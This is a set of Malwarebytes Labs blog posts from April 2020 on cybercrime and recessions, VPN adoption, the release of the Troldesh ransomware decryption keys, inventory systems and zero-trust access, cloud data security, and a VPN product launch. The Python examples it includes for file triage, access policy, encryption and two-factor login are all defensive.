If we wind ourselves forward to the past few years, we see talk of cybercrime specifically being a potential cause for a possible recession. In 2018, the fear of a massive attack on banking systems worldwide was touted as the way we’d all be dragged into recession town, population: us. The way this was supposed to happen is as follows:

  1. Rogue nation state or someone with equivalent resources somehow causes a massive “cashout strike”, where a huge wave of fraudulent withdrawals happens simultaneously and this is on such a scale that the banks all fall over. Yes, this is quite speculative.
  2. A script kiddy does…something…malicious and everything breaks. This is even more speculative.

That’s, uh, pretty much it. The article itself mentions that the banks would probably return to normal once functionality is restored, and if you’re undercutting your own “this is bad” point with “actually not really” then in all fairness it’s probably not how civilization is brought to its knees.

Elsewhere, we have another prediction of cyber related recession antics from 2019. Once again, the trigger is going to be some sort of undefined bank exploit / attack where the financial sector comes crashing down around our ears. The fascinating part is that the article begins by stating that a recession is definitely going to happen “within 2 years”. Well, they were correct – but not for the reasons stated. As it turns out, the cybers getting us might have been a bit more preferable to what came along in 2020…

(Potential) future: 2020 and beyond

As we’ve seen so far, computer criminals deciding to shuffle the deck and throw it out the window is primarily based on what-if scenarios ranging from unlikely and incredibly vague to unlikely and a bit less vague. Dusting off the crystal ball is an interesting exercise, but the reality of the situation is that the current financial meltdown came hand in hand with a virus of the non-digital kind.

Right now, we can’t move for conflicting reports during the actual pandemic itself. On the one hand, you have Ransomware authors claiming they won’t target hospitals during the pandemic. This isn’t entirely altruistic; they must know hammering health services will attract unnecessary legal attention in the fallout. Having said that: here’s a bunch of health services under fire from hack attacks during the pandemic. As before, some types go down, some go up. It isn’t uniform and very difficult to make sense of so much conflicting data.

Elsewhere, we have organizations reporting “five-fold increases” in cyber-attacks. By the same token, we have entities such as Microsoft and NCSC claiming the overall levels of cyber-crime aren’t going up. Criminals don’t seem to be making more money off the back of COVID-19 either.

That’s all well and good for scammers riding the coat-tails of the pandemic in the here and now, and numbers could change dramatically as time goes on. How about any future-based, lasting recession?

My entirely unscientific guess – and that’s all we can do, guess – is that even accounting for any new recession, cybercrime will just keep on keeping on and expand or contract at its own pace if it follows the same general pattern we saw in 2009. We’re in an unprecedented situation for technology, and may need to wait till the smoke clears to figure out what we do next. Believe me when I say I’m as fascinated as you are to see where it ends up.

Let’s just hope it’s a little bit more preferable to what we have right now.

The post Cybersecurity and the economy: when recession strikes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

VPNs are mainstream, which is good news

Wed, 04/29/2020 - 15:15

Virtual private networks (VPNs) have been growing in popularity for the last three years, a notable trend revealed in a collaborative report [PDF] by Top10VPN and GlobalWebIndex. This year is no different.

With a majority of the world’s internet users in isolation due to the COVID-19 global pandemic, an increase in VPN usage is expected, especially with so many people moving their regular work from the office into their homes. VPNs are the natural tool when employees cannot be physically on office premises but still need to securely connect to and access sensitive files, internal apps, and other resources they need to do their job.

A jump in work-from-home employees isn’t the only reason VPNs are in high demand. If anything, steady growth was suddenly accelerated by the effects of the pandemic, producing a historic spike in usage as internet users are thrust into a “new normal” of living closer to family and away from colleagues, extended family, friends, and strangers.

However, there are other factors at play when it comes to motivations for using VPNs. The report entitled “The Global VPN Usage Report 2020” sheds a light on these and more. Let’s take a look.

Current VPN usage trend

Why use VPNs?

More than 30 percent of internet users are now using VPNs, with the heaviest users being in Asia and the Middle East & Africa regions. Specifically, Indonesia and India, at 61 percent and 45 percent respectively, have the biggest share of VPN users compared to other countries. As you may recall, the Indonesian government has made attempts to filter the content its citizens see online, especially on social media platforms like Facebook, Twitter, and Reddit. The use of certain communication channels, such as WhatsApp, was also restricted.

Both the Middle East & Africa (MEA) and the Asia Pacific (APAC) regions are heavy users of VPN. (Courtesy of Top10VPN and GlobalWebIndex)

It’s fair to say that some VPN growth stems from attempts to censor a population. Note, though, that while VPN usage is high in areas where government repression is heaviest, these are also countries where using a VPN is still legal.

Perhaps surprisingly, democratic countries like Australia (69 percent) and the Netherlands (76 percent) have also seen notable market growth over a three-year period.

“In 2017, the Netherlands introduced a law that gave the intelligence services the right to wiretap online communications around suspects on a large scale and store the data for a period of 3 years,” explains Pieter Arntz, malware intelligence researcher for Malwarebytes, regarding this trend. “For that reason, the law was called the ‘Sleepwet’ (or dragnet law). Amnesty International and local privacy advocates made objections against the scale and the long retention period. Since the introduction, we have seen a big rise in the use of VPNs in the Netherlands.”

A data retention law coming into effect that year in Australia is the likely trigger for citizens to start using VPNs.

The report also outlines other reasons why people use VPNs.

The paradigm has shifted. VPN users typically claim they want to access entertainment content—currently ranking as the 6th top reason—that they otherwise cannot normally access. (Courtesy of Top10VPN and GlobalWebIndex)

In some countries, government surveillance isn’t a massive concern. What makes their citizens opt to use VPNs is the wish to hide their browsing activities from potential snoopers, which might be their ISP, advertisers, or threat actors.

Who uses VPNs?

For every 10 internet users, 3 use VPNs, according to the report.

Below is a global profile of who uses VPNs based on demographic data collected for this study. A VPN user is typically:

  • Male (36 percent, compared to 26 percent female)
  • Young (average of 37 percent between Gen Y and Gen Z users, compared to only an average of 21 percent for Gen X and Baby Boomers) *
  • More educated (average of 37 percent across college/university students and post-graduate users, compared to users whose schooling ended at age 18 or younger)
  • Mobile users (64 percent, compared to 62 percent of PC/laptop users)

*Older generations are notably catching up, though.

Heavy users in the APAC and MEA regions are young users who are “more urban and more affluent, relative to the rest of the population”. They are also more comfortable with digital tools.

What’s in a user’s VPN wish list?

Most users (72 percent) in the US and UK are using free VPNs compared to those who opted to pay (36 percent). For payers, the most common reason for this is to avoid the sharing of their information with third parties (54 percent).

When looking for a VPN, users prefer those with a reliable connection (54 percent), that are easy to use (54 percent), that are quick (54 percent), that have clear privacy/logging policies (43 percent), and that are reasonably priced (42 percent).

What attitudes or behaviors do VPN users have?

VPN users are more likely to be consistent with how they protect their online privacy than someone who doesn’t use a VPN. This means they use other measures like deleting browser cookies and using browsers that promote private browsing.

The report also found that internet users are at least aware that protecting their privacy online is important, but don’t know how. Even those deemed privacy-conscious are mostly not using VPNs.

When it comes to frequency in use, users in the US and UK tend to use VPNs every day for their daily browsing activities, not just for more private browsing. Younger users in these regions also claim that they see VPNs, primarily, as a privacy tool.

The road to safer surfing

It’s always interesting to take note of trends, motivations, and even buying behavior. However, there are other points in the report that merit highlighting. For one, many users associate VPNs with the word “secure”, although that isn’t always the case. This is particularly true on mobile devices.

When it comes to finding “the one” VPN for you, it is therefore no longer enough to take other people’s word for it. It is more crucial than ever for users to go hands-on and evaluate the products themselves. It is also important to do a little investigative work about the company behind the software or service you are eyeing. And when you do, please remember: ask the right questions.

Good luck!

The post VPNs are mainstream, which is good news appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat actors release Troldesh decryption keys

Tue, 04/28/2020 - 17:08

[Update: Kaspersky has updated their ShadeDecryptor tool to include decryption for the keys released by “shade team”. You can download the tool and find instructions here.]

A GitHub user claiming to represent the authors of the Troldesh Ransomware calling themselves the “Shade team” published this statement last Sunday:

“We are the team which created a trojan-encryptor mostly known as Shade, Troldesh or Encoder.858. In fact, we stopped its distribution in the end of 2019. Now we made a decision to put the last point in this story and to publish all the decryption keys we have (over 750 thousands at all). We are also publishing our decryption soft; we also hope that, having the keys, antivirus companies will issue their own more user-friendly decryption tools. All other data related to our activity (including the source codes of the trojan) was irrevocably destroyed. We apologize to all the victims of the trojan and hope that the keys we published will help them to recover their data.”

Are these the real Troldesh decryption keys?

Yes. Since the statement and the keys were published, our friends at Kaspersky have confirmed the validity of the keys and are working on a decryption tool. That tool will be added to the No More Ransom project. The “No More Ransom” website is an initiative by the National High Tech Crime Unit of the Dutch police, Europol’s European Cybercrime Centre, Kaspersky and McAfee, with the goal of helping victims of ransomware retrieve their encrypted data without having to pay the criminals.

In the past, a few decryption tools for some of the Troldesh variants have already been published on the “No More Ransom” website. We will update this post when the Kaspersky decryptor is released and would like to warn against following the instructions on GitHub unless you are a very skilled user. The few extra days of waiting shouldn’t hurt that much and a failed attempt may render the files completely useless.

When is it useful to use the Troldesh decryption tool?

Before you go off and run the expected tool on your victimized computer as soon as it comes out, check whether your encrypted files have one of these extensions:

  • xtbl
  • ytbl
  • breaking_bad
  • heisenberg
  • better_call_saul
  • los_pollos
  • da_vinci_code
  • magic_software_syndicate
  • windows10
  • windows8
  • no_more_ransom
  • tyson
  • crypted000007
  • crypted000078
  • rsa3072
  • decrypt_it
  • dexter
  • miami_california

If the file extensions from your affected system(s) do not match one on the list above, then your files are outside of the scope of this decryption tool. If you do find a match you should wait for the decryption tool to be published.
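A quick, read-only way to do that check across a whole drive, as an added example (not a tool from the original post, from Kaspersky or from No More Ransom): walk the file tree, count files per Troldesh extension from the list above, and report whether anything is in scope before a decryptor is ever run. Only the final extension is matched, case-insensitively, so a legitimate file that merely mentions one of the names (such as “notes_xtbl.txt”) is not counted. The function names and the sample directory are my own; the sample files are constructed for the demo and contain no real victim data.

```python
import os
import tempfile
from collections import Counter
from pathlib import Path

# Extensions Troldesh/Shade appends to encrypted files (the list from the post).
TROLDESH_EXTENSIONS = frozenset({
    "xtbl", "ytbl", "breaking_bad", "heisenberg", "better_call_saul",
    "los_pollos", "da_vinci_code", "magic_software_syndicate", "windows10",
    "windows8", "no_more_ransom", "tyson", "crypted000007", "crypted000078",
    "rsa3072", "decrypt_it", "dexter", "miami_california",
})


def troldesh_extension(path):
    """Return the matching Troldesh extension (lower-cased) if the file's
    final suffix is one of them, else None. Only the last suffix counts."""
    ext = Path(path).suffix.lstrip(".").lower()
    return ext if ext in TROLDESH_EXTENSIONS else None


def scan_tree(root):
    """Walk `root` and count files per Troldesh extension. Nothing is opened
    or modified, so this is safe to run on a live victim system before any
    decryption attempt."""
    counts = Counter()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = troldesh_extension(os.path.join(dirpath, name))
            if ext is not None:
                counts[ext] += 1
    return counts


def in_scope(counts):
    """True if at least one file carries a Troldesh extension, i.e. the
    released keys and the upcoming decryptor can apply to this system."""
    return sum(counts.values()) > 0


def build_sample_tree():
    """Constructed sample directory for the demo (not real victim data):
    two renamed documents, one clean photo, one upper-cased extension and
    one decoy whose name contains 'xtbl' but whose real extension is .txt."""
    root = tempfile.mkdtemp(prefix="troldesh_triage_")
    samples = [
        "docs/report.docx.xtbl",
        "docs/budget.xlsx.crypted000007",
        "photos/holiday.jpg",
        "photos/cat.jpg.BREAKING_BAD",
        "notes_xtbl.txt",
    ]
    for rel in samples:
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"\x00" * 16)
    return root


if __name__ == "__main__":
    counts = scan_tree(build_sample_tree())
    print(dict(counts), "-> in scope" if in_scope(counts) else "-> not in scope")
```

Run it against the real root (for example `scan_tree("C:\\")` or `scan_tree("/")`) rather than the sample; a non-empty count tells you which variant extensions are present, which is also what you will want to know when the decryptor asks.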

Why would this gang publish the Troldesh decryption keys?

The reason for all this is unknown and subject to speculation. We can imagine a few different reasons, ordered from not very likely to credible.

  • Maybe their conscience caught up with them. After all they do apologize to the victims. But these are only the victims that didn’t pay or were unable to recover their files despite paying the ransom.
  • The Shade team may suspect that someone has breached their key vault and they were forced or decided on their own accord to publish the keys for that reason. But we have seen no claims to support that possibility.
  • The profitability of the ransomware had reached its limit. Ransom.Troldesh has been around since 2014 and we saw a steep detection spike once the threat actors ventured outside of Russian targets in February of 2019. But after that initial spike the number of detections gradually faded out. It was still active and generating money though.
Number of Malwarebytes detections of Ransom.Troldesh from July 2018 till April 2020
  • The development of this ransomware has reached its technical limit and the team will focus on a new software project. The team stated that it stopped distribution at the end of 2019, but did not let on what it is currently working on.
What we know

All we know for sure is that the keys have been verified and a decryption tool is in the works. Everything else is speculation based on a statement made on GitHub by an account named “shade-team” that joined GitHub on April 25th, just prior to the statement.

Victims can keep their eyes peeled for the release of the decryption tool. We’ll keep you posted.

Stay safe!

The post Threat actors release Troldesh decryption keys appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Switching from a “Just in Time” delivery system should include planning ahead

Tue, 04/28/2020 - 15:15

As it becomes clear that some things will never again be the same after the global coronavirus pandemic, it is time to prepare for the future. The cybersecurity implications of upcoming changes will be most noticeable in organizations that rely on security models like the software defined perimeter.

The software defined perimeter is a model closely related to the zero trust framework, in which users must authenticate themselves first before accessing any company-sensitive documents or on-site information. Connectivity in the software defined perimeter is based on the premise that each device and identity must be verified before being granted access to the network.

Below, we explore why unexpected demand spikes may force organizations to reconsider their “Just in Time” delivery networks. But remember, a switch from one system brings questions about any new one.

Just in time delivery

As an example of the changes we can expect, let’s assume that after the coronavirus pandemic, some organizations will move away from the Just In Time (JIT) delivery system they were relying on when their supply lines started to dry up.

Just In Time delivery systems provide goods as orders come in, allowing for a lean, at-need production process with little to no surplus. But as we’ve recently seen, these types of systems are vulnerable to sudden peaks in demand: depleted supply chains have already hit several industries, with the most poignant victim being healthcare. Hospitals, clinics, and medical centers around the world have quickly run out of masks, hand sanitizer, and ventilators in the months since COVID-19 struck.

Many stores, both brick-and-mortar and web shops, have already faced the same problem. Soon after China applied its regional quarantine, global supply chains took a hit, with some businesses impacted sooner than others. Whether your goods arrive by container ship or by air freight makes a big difference to how soon your line could dry up.

How we need a constant stream of goods

To western economies, a continuous flow of goods and components is of the utmost importance. We regard transport and logistics as vital infrastructure for compelling reasons. Many of our factories depend on components made on the other side of the globe, and consumers recently learned just how many of their daily products originate from Asia. It’s not just electronics, toys, and clothing being made elsewhere, but also a lot of car parts, tools, and condoms.

One way to solve this problem for the next lock-down (which is a possibility, depending on how local governments decide to “open up” their economies) is to decentralize the origin of products that we can’t afford to miss. But by market standards, goods are often produced wherever labor is cheapest, and spreading production would increase price. In some cases, consumers might be willing to pay a higher price for locally produced goods. In other cases, trade restrictions could drive up the price for goods produced abroad. In both cases, the supply lines would get shorter and become more resilient to interruption.

Just in Time inventory management saves money by minimizing the necessary amount of storage room and by limiting goods going to waste because they go over the expiration date. What you need to realize is that you are not solving this problem, you are just moving it to your logistics partner, who may be better equipped to handle it as they probably do it for many others. And in turn they rely on other shipping and production companies to keep their stocks at a level which allows them to satisfy the needs of their customers.

Now that organizations have learned that a broken link in the supply chain can have drastic results for those at the end of the line, the question is whether this system can be used for every type of good, or whether we need to prioritize between essential goods and those we can afford to miss for a while.

Different software

Switching to another inventory system requires another type of software. Where JIT inventory management may be as simple as sending out an order to the logistics partner (whether it’s yours or your supplier’s is not really relevant), keeping your own inventory requires a different approach. Countless goods have expiration dates, and not just food and drugs. Some other products also lose their usefulness over time. Others may even lose their value, or the cost to produce them may drop rapidly compared to other products.

Different software comes with a bunch of questions, mainly related to security:

  • Who needs access?
  • What will be the permissions of the software itself?
  • How are we going to manage (remote) accessibility?
  • Do we anticipate any compliance issues?
  • How did the software perform during security testing?
  • What will be the procedure during transition?
  • How will this influence my software defined perimeter?

Most of the time, simple stock-keeping software should be less complicated than Just-In-Time inventory management, so it may be a good time to rethink some of the settings you have chosen while you were still using JIT. Even when you end up using a mix of both systems (as many organizations do) the time of change is typically a good time to reconsider choices made in the past. Nobody may have reviewed them because they simply worked. But that doesn’t necessarily mean that they were the optimal choices.

Most of the questions above speak for themselves but will need to be answered on a case by case basis.

Recommended reading: Explained: the strengths and weaknesses of the Zero Trust model

Software defined perimeter

As you may have expected, the software defined perimeter is a security model which is often used in combination with cloud-based software or when remote access to on-premise applications is needed. The software defined perimeter finds its base in the Zero Trust model and divides network access into small segments by establishing direct connections between users and the resources they access.

Logic dictates that when you switch from JIT to a more local inventory this will impact the software defined perimeter. In the JIT system you can expect outbound connections to be established that control the flow of needed goods into the organization. In a system based on local storage, you may see more requests from remote workers to check up on the state of the inventory.
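To make the access questions above concrete, here is an added example (not code from the post or from any product it mentions) of the kind of deny-by-default decision a software defined perimeter controller makes before it brokers a connection to a resource. The identities, device attributes, group names and the two resources ("inventory-app" and "jit-ordering-gateway") are hypothetical; the point is that each resource carries its own policy covering who, from what kind of device, with which second factor, may perform which action, so a remote warehouse worker checking stock never gets a path to the old ordering link.

```python
from dataclasses import dataclass


# Hypothetical session attributes; in practice these come from the identity
# provider and the device-management agent, not from the user.
@dataclass(frozen=True)
class Identity:
    user: str
    groups: frozenset      # e.g. {"warehouse"}, {"purchasing"}, {"finance"}
    mfa_verified: bool     # second factor completed for this session


@dataclass(frozen=True)
class Device:
    managed: bool          # enrolled in the organization's device management
    disk_encrypted: bool
    os_patched: bool


@dataclass(frozen=True)
class ResourcePolicy:
    allowed_groups: frozenset
    allowed_actions: frozenset
    require_mfa: bool = True
    require_managed_device: bool = True


# One policy per resource: the perimeter is drawn around each application,
# not around "the network", so a user is offered only what their role needs.
POLICIES = {
    # Stock levels kept on site: warehouse and purchasing can read and update.
    "inventory-app": ResourcePolicy(
        allowed_groups=frozenset({"warehouse", "purchasing"}),
        allowed_actions=frozenset({"read", "write"}),
    ),
    # The outbound JIT ordering link: purchasing only, and only to place orders.
    "jit-ordering-gateway": ResourcePolicy(
        allowed_groups=frozenset({"purchasing"}),
        allowed_actions=frozenset({"order"}),
    ),
}


def device_compliant(device):
    """Posture check; an unmanaged or unpatched device fails closed."""
    return device.managed and device.disk_encrypted and device.os_patched


def authorize(identity, device, resource, action):
    """Deny-by-default decision. Every check must pass before a connection to
    the resource is brokered; the reason is returned for audit logging."""
    policy = POLICIES.get(resource)
    if policy is None:
        return False, "unknown resource"
    if not (identity.groups & policy.allowed_groups):
        return False, "user is not in a group allowed on this resource"
    if policy.require_mfa and not identity.mfa_verified:
        return False, "second factor required"
    if policy.require_managed_device and not device_compliant(device):
        return False, "device does not meet posture requirements"
    if action not in policy.allowed_actions:
        return False, "action not permitted on this resource"
    return True, "ok"


if __name__ == "__main__":
    ana = Identity("ana", frozenset({"warehouse"}), mfa_verified=True)
    laptop = Device(managed=True, disk_encrypted=True, os_patched=True)
    home_pc = Device(managed=False, disk_encrypted=True, os_patched=True)
    for dev, res, act in ((laptop, "inventory-app", "read"),
                          (home_pc, "inventory-app", "read"),
                          (laptop, "jit-ordering-gateway", "order")):
        print(res, act, authorize(ana, dev, res, act))
```

Because the decision is made per resource and per request, changing the inventory model means editing the policy table, not re-segmenting the network.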

If this type of change will not affect your organization, there are many other changes that might be caused or ramped up by this crisis. So, it might be beneficial to try and plan ahead. A prepared organization doesn’t get caught by surprise.

Stay safe!


Cloud data protection: how to secure what you store in the cloud

Mon, 04/27/2020 - 18:05

The cloud has become the standard for data storage. Just a few years ago, individuals and businesses pondered whether or not they should move to the cloud. This is now a question of the past. Today, the question isn’t whether to adopt cloud storage but rather how.

Despite its rapid pace of adoption, there are some lingering concerns around cloud storage. Perhaps the most persistent issue is the matter of cloud data security. With as much critical data as there is stored on the cloud, and with a “nebulous” grasp on exactly how it’s stored and who has access, how can people be sure it’s safe?

Growing cloud usage

Cloud usage has exploded in recent years. Five years ago, global cloud traffic was at 3,851 exabytes, a number which has since skyrocketed to more than 16,000 exabytes. As the functionality and connectivity of the Internet grows, cloud traffic will likely increase with it.

People store a vast amount of information on the cloud. It’s not just businesses hosting IT operations or client data on these platforms anymore. Individuals use services like OneDrive, Google Drive, Dropbox, and iCloud to store everything from tax documents to family photos.

With all this data so easily accessible on the cloud, privacy and data protection become more prevalent concerns. Where exactly is the data going and who can see it? If someone can access all of their documents, pictures and contacts instantly from their phone, can hackers just as easily obtain this information? There are more than 1 billion cloud users today who, if they don’t already know, should be asking themselves these questions and learning how to keep their cloud data private and secure.

Securing cloud data

Cloud storage may seem like a security threat at first glance, but it can offer superior security over other methods for businesses. So, what about individuals? By taking the right steps towards careful cloud usage, people can be sure their data is safe.

Keep local backups

The first step in cloud data protection is locally backing up data. Storing things on the cloud offers greater convenience and utility, making it an ideal primary option, but it’s essential to back up important files. Having backups on a local storage device like a flash drive or server means the files remain available if the cloud account is compromised or locked, or the data is deleted.

Use the cloud judiciously

Users should be mindful of what kinds of data they store on the cloud. As secure as modern cloud storage is, there’s no such thing as being too careful. Most files are fine to keep anywhere, but sensitive information like bank details or Social Security numbers is best left offline.

Use encryption

Encryption is one of the most helpful methods of securing any digitally stored data. By encrypting files before uploading them to the cloud, users ensure that the contents stay unreadable even to the cloud provider, because only the user holds the key. Some providers offer varying levels of encryption, but encrypting on your own device with third-party software provides another layer of protection. The trade-off is that the key is now yours to keep: lose it, and the provider cannot recover the files for you.
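As an added example (not code from the post or from any cloud provider), the following Python shows what "encrypt before upload" looks like in practice with AES-256-GCM from the `cryptography` package, which it assumes is installed. The key is generated and kept on the device; the provider only ever receives the nonce plus ciphertext. Binding the file name as associated data means a blob that is renamed, swapped or corrupted on the provider side fails to decrypt instead of quietly returning the wrong bytes, and the same failure shows why losing the key is unrecoverable. The sample file name and contents are constructed placeholders.

```python
import os

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

NONCE_LEN = 12  # 96-bit nonce, the size AES-GCM is designed for; fresh per file


def generate_key():
    """256-bit key. It stays on the user's device (or in a password manager).
    The provider never sees it, so losing it means losing every file
    encrypted under it; there is no "forgot my key" button."""
    return AESGCM.generate_key(bit_length=256)


def encrypt_for_upload(key, plaintext, filename):
    """Encrypt file contents before they leave the device. The file name is
    bound as associated data so the ciphertext only verifies under that name."""
    nonce = os.urandom(NONCE_LEN)
    ciphertext = AESGCM(key).encrypt(nonce, plaintext, filename.encode())
    return nonce + ciphertext  # this blob is all the provider ever stores


def decrypt_after_download(key, blob, filename):
    """Inverse of encrypt_for_upload; raises InvalidTag on any mismatch."""
    nonce, ciphertext = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return AESGCM(key).decrypt(nonce, ciphertext, filename.encode())


def decrypts_cleanly(key, blob, filename):
    """True only if the blob authenticates and decrypts under this key and name."""
    try:
        decrypt_after_download(key, blob, filename)
        return True
    except InvalidTag:
        return False


def with_flipped_byte(blob):
    """Simulate silent corruption or tampering of the stored copy."""
    damaged = bytearray(blob)
    damaged[-1] ^= 0x01
    return bytes(damaged)


# Constructed sample file, not real data.
SAMPLE_NAME = "2019-tax-return.pdf"
SAMPLE_CONTENT = b"%PDF-1.4 (constructed placeholder content for the example)"

if __name__ == "__main__":
    key = generate_key()
    blob = encrypt_for_upload(key, SAMPLE_CONTENT, SAMPLE_NAME)
    print("provider stores", len(blob), "bytes; plaintext visible:",
          SAMPLE_CONTENT in blob)
    print("own key decrypts:", decrypts_cleanly(key, blob, SAMPLE_NAME))
    print("other key decrypts:", decrypts_cleanly(generate_key(), blob, SAMPLE_NAME))
    print("tampered blob decrypts:", decrypts_cleanly(key, with_flipped_byte(blob), SAMPLE_NAME))
```

The "other key" line is the key-loss scenario: a provider holding only the blob is in exactly the same position as an attacker who stole it.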

Read the terms of service

Most people skip over the terms of service, but this can be a security risk. If someone agrees to terms they didn’t read, they could legally give their cloud service provider more rights over their data than they realize. It can seem like a tedious task, but reading user agreements highlights what a company can and can’t do with data on their platforms.

Use good password hygiene

One of the simplest ways to bolster cloud data security is by using a strong password. Hackers can crack 90 percent of passwords in a matter of seconds because the vast majority of people prefer easy-to-remember passwords over strong ones, and a disappointing number of people choose passwords like “123456” or “password” to protect their online info.

The advice here is simple: Create a unique, long password that includes special characters, numbers, and letters, ideally generated and stored by a password manager. Change it promptly if you have any reason to believe it has been exposed; a forced change every few months on its own buys little and tends to push people toward predictable variations of the old password. Do not share your password via email or text, and do not use easily identifiable information in your password, like your birthdate or address.

Multi-factor authentication further secures the login process. Most cloud providers offer two-step verification, so that users need more than just a password to access their data. With it enabled, even an attacker who has cracked or stolen the password still can’t get into the account.
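The two preceding paragraphs describe the password and the second step separately; this added example (not code from the post or from any provider) shows how the two combine on the server side, using only the Python standard library. Passwords are stored as salted PBKDF2 hashes and the second factor is a standard RFC 6238 time-based code, the kind an authenticator app produces, checked in constant time with a one-step window for clock drift. The demo account, its password and the TOTP secret (the RFC 6238 test key) are constructed for the example.

```python
import hashlib
import hmac
import os
import struct

PBKDF2_ROUNDS = 200_000
TOTP_STEP = 30  # seconds per code, as authenticator apps use


def hash_password(password, salt=None, rounds=PBKDF2_ROUNDS):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest) for storage."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def verify_password(password, salt, digest, rounds=PBKDF2_ROUNDS):
    """Recompute and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(candidate, digest)


def hotp(secret, counter, digits=6):
    """RFC 4226 HMAC-based one-time password (HMAC-SHA1, dynamic truncation)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, unix_time, step=TOTP_STEP, digits=6):
    """RFC 6238 code for the time step containing unix_time."""
    return hotp(secret, int(unix_time) // step, digits)


def verify_totp(secret, submitted, unix_time, step=TOTP_STEP, window=1):
    """Accept the current step and one step either side (clock drift);
    constant-time comparison so a wrong code leaks nothing through timing."""
    counter = int(unix_time) // step
    return any(hmac.compare_digest(hotp(secret, counter + d), submitted)
               for d in range(-window, window + 1))


def login(password, stored_salt, stored_digest, totp_secret, code, unix_time):
    """Both factors must pass. A cracked or leaked password alone gets nowhere,
    which is the property the text above describes."""
    if not verify_password(password, stored_salt, stored_digest):
        return False
    return verify_totp(totp_secret, code, unix_time)


# Constructed demo account. DEMO_SECRET is the RFC 6238 reference test key,
# so its codes can be checked against the RFC's published vectors.
DEMO_PASSWORD = "correct horse battery staple"
DEMO_SECRET = b"12345678901234567890"
DEMO_SALT, DEMO_DIGEST = hash_password(DEMO_PASSWORD)

if __name__ == "__main__":
    now = 59  # RFC 6238 vector: this step yields 287082
    print("code for step:", totp(DEMO_SECRET, now))
    print("right password, right code:",
          login(DEMO_PASSWORD, DEMO_SALT, DEMO_DIGEST, DEMO_SECRET, "287082", now))
    print("right password, guessed code:",
          login(DEMO_PASSWORD, DEMO_SALT, DEMO_DIGEST, DEMO_SECRET, "000000", now))
```

In a real deployment the TOTP secret is stored alongside the account just as carefully as the password hash, and the server rejects reuse of a code that has already been accepted within its window.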

Protect yourself from cyberthreats

Antivirus software belongs on every computer that touches cloud storage. Some forms of malware, such as keyloggers, can hand attackers the credentials to protected systems without users realizing it. By using a cloud provider with built-in antivirus scanning, third-party antivirus software, or both, users reduce their exposure to these threats.

Common security mistakes

Quite often, the most significant threat to cloud data protection is improper use. In the corporate sphere, more than 40 percent of data breaches are the result of employee errors. No matter how many safety features a system has, user mistakes can always jeopardize security.

One of the most common cloud security mistakes is poor password handling. People use weak or reused passwords, keep using them after they have leaked, or even list passwords in unsecured online documents, putting their information at risk. Users can avoid this by using a strong, unique password for each account and replacing any password that may have been exposed.

Data breaches are not as substantial a problem if there is no sensitive data at risk. To keep essential or private information from leaking or being stolen, the most secure practice is to store it somewhere other than the cloud. People should use cloud storage for things they need to access frequently, but not for things like credit card numbers.

Finally, many people also fall victim to phishing or pharming scams. Users can easily avoid these by never clicking suspicious links or giving out personal information to an unknown source.

With robust security measures and a healthy dose of general internet safety guidelines, cloud storage can be as secure as any other option on the market.


Lock and Code S1Ep5: Mythbusting and understanding VPNs with JP Taggart

Mon, 04/27/2020 - 15:00

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to JP Taggart, senior security researcher at Malwarebytes, about VPNs—debunking their myths, explaining their actual capabilities, and providing some advice on what makes a strong VPN.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on Labs, plus other cybersecurity news:
  • What a deal: details of 267 Million Facebook users for 500 Euros. (Source:
  • Smart IoT home hubs are vulnerable to remote code execution attacks. (Source: ZDNet)
  • Automated bots are increasingly scraping data and attempting logins. (Source: DarkReading)
  • A new Android trojan targets banking customers with overlay attacks. (Source: ThreatPost)
  • Severe vulnerability in OpenSSL allows DoS attacks. (Source: SecurityWeek)
  • Vivaldi adds built-in tracker and ad blocker to latest browser version. (Source: TechSpot)

Stay safe, everyone!


Introducing Malwarebytes Privacy

Thu, 04/23/2020 - 12:00

Here at Malwarebytes, we’re no strangers to using virtual private networks (VPNs) to protect our privacy while browsing online. Regular readers of our blog will remember that we’ve advised on VPN usage on many occasions, whether for mobile device users looking for anonymity or business owners wanting additional authentication protocols. We believe VPNs are an essential part of layered protection that users should deploy against threats to both devices and personal data.

One important note we consistently emphasize is that it’s important to choose a VPN that does what it promises and doesn’t abuse your data. To make that choice a little easier, we’ve developed our own VPN that Malwarebytes users can trust to protect your data and privacy every time you go online. To that end, we proudly present: Malwarebytes Privacy.

What is Malwarebytes Privacy?

Malwarebytes Privacy is a next-gen VPN that helps protect your privacy and your personal information when you go online. Our VPN secures your connection, keeping your online activity private and protected. All your traffic travels through an encrypted tunnel to our VPN servers, then onward to the website you are visiting. This way, websites see the VPN server’s IP address instead of yours, and your ISP sees only an encrypted connection to the VPN server rather than the sites you visit.

Most importantly, Malwarebytes Privacy does not collect user logs or telemetry data whatsoever. Your data remains private—even from us.

What makes Malwarebytes Privacy next gen?

If you have used other VPNs in the past, you may have experienced a serious slow-down of your Internet traffic. This is a logical consequence of tunneling through a remote server. But if you compare Malwarebytes Privacy to other VPNs, you will experience a smoother flow of traffic that is much faster than traditional VPNs.

Not only does Malwarebytes improve your Internet speed compared to other VPNs. It also:

  • Doesn’t slow down your computer
  • Shows less battery usage for portable devices
  • Uses best-in-class 256-bit AES encryption

As VPNs move from the workplace to the home, Malwarebytes Privacy uses the latest technology to give users better performance and privacy online.

Why use a VPN at all?

